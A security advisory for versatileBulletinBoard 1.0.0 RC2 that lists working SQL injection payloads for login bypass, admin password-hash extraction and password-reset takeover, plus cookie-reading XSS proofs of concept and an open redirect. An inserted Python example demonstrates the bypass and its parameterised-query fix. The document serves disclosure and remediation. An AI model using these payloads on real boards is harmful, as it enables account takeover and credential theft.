
versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover



versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL injection vulnerabilities / login bypass / cross site scripting / information disclosure

software: versatileBulletinBoard V1.0.0 RC2
site: http://vbb.eniki.de/


all of the following require magic_quotes_gpc to be off...

A)

i) SQL INJECTION / LOGIN BYPASS

you can log in as admin by entering:

login: ' or 1 and name='[adminname]'/*
pass: [whatever]

you can also log in with the credentials/rights of any user by entering:

login: ' or 1 and name='[username]'/*
pass: [whatever]
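As an added illustration (not code from the advisory or from versatileBulletinBoard, whose source is not shown here), the Python model below reproduces the login bypass above against a constructed in-memory table and sets it beside the parameterised query that stops it; the same root cause (request fields pasted into SQL text) is behind the other injections listed further down. The column names, the query shape and the account data are assumptions.

```python
import hashlib
import sqlite3

# Constructed stand-in for the board's vbb_user table: the advisory says it
# holds MD5 password hashes and that the admin usually has ID 11 (column
# names are assumed).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE vbb_user (ID INTEGER, name TEXT, pass TEXT)")
    for uid, name, pw in [(11, "admin", "correct horse"), (12, "bob", "hunter2")]:
        db.execute("INSERT INTO vbb_user VALUES (?, ?, ?)",
                   (uid, name, hashlib.md5(pw.encode()).hexdigest()))
    return db

def vulnerable_sql(login, password):
    # Hypothetical reconstruction of the weak pattern (not the board's real
    # code): request fields pasted straight into the SQL text, as happens when
    # magic_quotes_gpc is off. MD5 only mirrors what the board stores.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return ("SELECT ID, name FROM vbb_user WHERE name='%s' AND pass='%s'"
            % (login, pw_hash))

def login_vulnerable(db, login, password):
    """Returns (ID, name) of the matched row, or None. The trailing '/*' in
    the advisory's payload turns the AND pass=... clause into a comment, so
    the WHERE reduces to  name='' OR (1 AND name='admin')."""
    return db.execute(vulnerable_sql(login, password)).fetchone()

def login_fixed(db, login, password):
    """Hardened form: bound parameters keep the input as data, never as SQL,
    so the same payload is just a user name that does not exist."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return db.execute("SELECT ID, name FROM vbb_user WHERE name=? AND pass=?",
                      (login, pw_hash)).fetchone()

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1 and name='admin'/*"  # the bypass string from the advisory
    print("vulnerable:", login_vulnerable(db, payload, "whatever"))  # (11, 'admin')
    print("fixed:", login_fixed(db, payload, "whatever"))            # None
    print("fixed, real creds:", login_fixed(db, "bob", "hunter2"))   # (12, 'bob')
```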

ii) SQL INJECTION in the "search this thread" feature while browsing the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickname]'/*
(the input field is too short to type this by hand, but the POST request can be modified...)


iii) SQL INJECTION in index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

iv) SQL INJECTION in index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

(to list the USER ID of any user; this will be useful later, as you will see... however, the admin's user ID is usually "11")


v) SQL INJECTION in the "to" argument when posting a private message (you need to be logged in for this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*


vi) SQL INJECTION in the search-for-posts feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*


vii) SQL INJECTION in userlistpre.php "list" argument:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*


viii) SQL INJECTION when viewing a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*


with ii), iii), iv), v), vi), vii) and viii) the admin's MD5 password hash is displayed on screen


ix) SQL INJECTION: you can list all users, which could be useful for dumping all passwords from the database:

http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*


to check whether your installation is vulnerable, just enter ' in the login field; if you get a SQL error, it is

x) SQL INJECTION in the "forgot password" feature: a user could manipulate the email field to have new passwords for any admin/user sent to himself

you will receive a link like this:

http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]

to set a new password, but... you can call this URL at any time if you have the hash


combining these issues, a user can take full control of the board, reset all passwords...
proof of concept exploit incoming...


B)

xi) XSS:
possible cross site scripting; you can craft a malicious URL that redirects a user to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]

and you can manipulate user cookies, PoC:

http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file=";><script>alert(document.cookie)</script>

also, you can craft malicious URLs that, by manipulating the SQL queries, display arbitrary JavaScript, PoC:

http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*


C)

xii) information disclosure:
this is an online utility, but listing all files and their versions doesn't seem very safe ;)

http://[target]/[path]/getversions.php


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html